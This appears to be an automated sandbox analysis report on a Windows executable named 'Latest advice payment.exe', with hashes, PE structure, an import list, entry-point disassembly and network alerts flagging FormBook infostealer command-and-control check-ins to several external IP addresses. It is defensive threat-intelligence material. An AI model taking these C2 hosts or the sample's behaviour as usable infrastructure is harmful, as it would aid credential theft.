                                                          Preview:...H[7MG<9ON.XV.T263WWS.WHX7MG89ON6WXVHT263WWSYWHX7MG89ON6W.VHT<).YW.P.i.6...m''Ew($'3@W^w4279',./".K: .>6v..a.^836wZER.MG89ON6.Y_.iRQ.j74.j(?.W..u.Q.B...VT.M..t8P..QZ'sV0.VHT263WW..WH.6LG.O..6WXVHT26.WURRVCX7.C89ON6WXVH.&63WGSYW8\7MGx9O^6WXTHT463WWSYWNX7MG89ONFSXVJT263WWQY..X7]G8)ON6WHVHD263WWSIWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT.BV/#SYW<.3MG(9ONnSXVXT263WWSYWHX7MG.9O.6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89ON6WXVHT263WWSYWHX7MG89O
Process: C:\Windows\SysWOW64\bitsadmin.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1239949490932863
Encrypted: false
SSDEEP: 384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5: 271D5F995996735B01672CF227C81C17
SHA1: 7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256: 9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512: 62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious: false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.198363417267728
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:Latest advice payment.exe
                                                          File size:1'216'000 bytes
                                                          MD5:b1ff44d20bc312e62d55daf8a8cf5b07
                                                          SHA1:c470001e130a55b1081ba071c47c0e1e60570453
                                                          SHA256:5b359667005091665aad2d9773ea103cbdb88c47a1a9a7b44243d83ef90b8a15
                                                          SHA512:5ae1af3a858ebdc73f5ae6423293dd5831b96a95a95354479aa8763f40dbbe059242d0b0163fbbb29202cc1eb1220007b0dbf6239e7b4faffdd29ed84afae639
                                                          SSDEEP:24576:ou6J33O0c+JY5UZ+XC0kGso6Faznc/5AZxS3+BkVrPWY:Cu0c++OCvkGs9FaznchAZxReCY
                                                          TLSH:1D45CF2273DDC361CB769173BF69B7016EBF78610630B85B2F880D7DA960162162D7A3
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                          Icon Hash:aaf3e3e3938382a0
                                                          Entrypoint:0x427dcd
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x674F050F [Tue Dec 3 13:18:07 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                          Instruction
                                                          call 00007F772885E77Ah
                                                          jmp 00007F7728851544h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [esp+10h]
                                                          mov ecx, dword ptr [esp+14h]
                                                          mov edi, dword ptr [esp+0Ch]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007F77288516CAh
                                                          cmp edi, eax
                                                          jc 00007F7728851A2Eh
                                                          bt dword ptr [004C31FCh], 01h
                                                          jnc 00007F77288516C9h
                                                          rep movsb
                                                          jmp 00007F77288519DCh
                                                          cmp ecx, 00000080h
                                                          jc 00007F7728851894h
                                                          mov eax, edi
                                                          xor eax, esi
                                                          test eax, 0000000Fh
                                                          jne 00007F77288516D0h
                                                          bt dword ptr [004BE324h], 01h
                                                          jc 00007F7728851BA0h
                                                          bt dword ptr [004C31FCh], 00000000h
                                                          jnc 00007F772885186Dh
                                                          test edi, 00000003h
                                                          jne 00007F772885187Eh
                                                          test esi, 00000003h
                                                          jne 00007F772885185Dh
                                                          bt edi, 02h
                                                          jnc 00007F77288516CFh
                                                          mov eax, dword ptr [esi]
                                                          sub ecx, 04h
                                                          lea esi, dword ptr [esi+04h]
                                                          mov dword ptr [edi], eax
                                                          lea edi, dword ptr [edi+04h]
                                                          bt edi, 03h
                                                          jnc 00007F77288516D3h
                                                          movq xmm1, qword ptr [esi]
                                                          sub ecx, 08h
                                                          lea esi, dword ptr [esi+08h]
                                                          movq qword ptr [edi], xmm1
                                                          lea edi, dword ptr [edi+08h]
                                                          test esi, 00000007h
                                                          je 00007F7728851725h
                                                          bt esi, 03h
                                                          jnc 00007F7728851778h
                                                          Programming Language:
                                                          • [ASM] VS2013 build 21005
                                                          • [ C ] VS2013 build 21005
                                                          • [C++] VS2013 build 21005
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2013 UPD4 build 31101
                                                          • [RES] VS2013 build 21005
                                                          • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x60534 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x128000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x60534 | 0x60600 | 75ee14026eba3fb0ff6e449640964528 | False | 0.9318483503566797 | data | 7.903322811583743 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x128000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x577f9 | data | | | 1.0003236670359075
RT_GROUP_ICON | 0x126fb4 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x12702c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x127040 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x127054 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x127068 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x127144 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-03T23:27:37.679953+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49808 | 161.97.168.245 | 80 | TCP
2024-12-03T23:27:37.679953+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49808 | 161.97.168.245 | 80 | TCP
2024-12-03T23:27:54.985524+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49847 | 27.124.4.246 | 80 | TCP
2024-12-03T23:27:57.735515+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49854 | 27.124.4.246 | 80 | TCP
2024-12-03T23:28:00.532358+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49860 | 27.124.4.246 | 80 | TCP
2024-12-03T23:28:03.251083+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49868 | 27.124.4.246 | 80 | TCP
2024-12-03T23:28:03.251083+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49868 | 27.124.4.246 | 80 | TCP
2024-12-03T23:28:11.122946+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49889 | 149.88.81.190 | 80 | TCP
2024-12-03T23:28:13.813553+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49895 | 149.88.81.190 | 80 | TCP
2024-12-03T23:28:16.485474+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49900 | 149.88.81.190 | 80 | TCP
2024-12-03T23:28:19.294902+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49907 | 149.88.81.190 | 80 | TCP
2024-12-03T23:28:19.294902+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49907 | 149.88.81.190 | 80 | TCP
2024-12-03T23:28:27.110367+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49927 | 85.159.66.93 | 80 | TCP
2024-12-03T23:28:29.782267+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49934 | 85.159.66.93 | 80 | TCP
2024-12-03T23:28:32.454058+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49940 | 85.159.66.93 | 80 | TCP
2024-12-03T23:28:35.059248+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49947 | 85.159.66.93 | 80 | TCP
2024-12-03T23:28:35.059248+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49947 | 85.159.66.93 | 80 | TCP
2024-12-03T23:28:42.023341+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49965 | 185.27.134.144 | 80 | TCP
2024-12-03T23:28:44.743434+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49970 | 185.27.134.144 | 80 | TCP
2024-12-03T23:28:47.368148+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49977 | 185.27.134.144 | 80 | TCP
2024-12-03T23:28:50.156059+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49983 | 185.27.134.144 | 80 | TCP
2024-12-03T23:28:50.156059+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49983 | 185.27.134.144 | 80 | TCP
2024-12-03T23:28:57.141359+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49999 | 172.67.145.234 | 80 | TCP
2024-12-03T23:28:59.557104+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50005 | 172.67.145.234 | 80 | TCP
2024-12-03T23:29:02.485088+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50013 | 172.67.145.234 | 80 | TCP
2024-12-03T23:29:04.924338+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50021 | 172.67.145.234 | 80 | TCP
2024-12-03T23:29:04.924338+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50021 | 172.67.145.234 | 80 | TCP
2024-12-03T23:29:12.000623+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50030 | 172.67.167.146 | 80 | TCP
2024-12-03T23:29:14.601977+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50031 | 172.67.167.146 | 80 | TCP
2024-12-03T23:29:17.310071+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50032 | 172.67.167.146 | 80 | TCP
2024-12-03T23:29:19.934138+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50033 | 172.67.167.146 | 80 | TCP
2024-12-03T23:29:19.934138+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50033 | 172.67.167.146 | 80 | TCP
2024-12-03T23:29:27.125540+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50034 | 154.88.22.101 | 80 | TCP
2024-12-03T23:29:29.797405+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50036 | 154.88.22.101 | 80 | TCP
2024-12-03T23:29:32.471179+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50037 | 154.88.22.101 | 80 | TCP
2024-12-03T23:29:35.274693+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50038 | 154.88.22.101 | 80 | TCP
2024-12-03T23:29:35.274693+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50038 | 154.88.22.101 | 80 | TCP
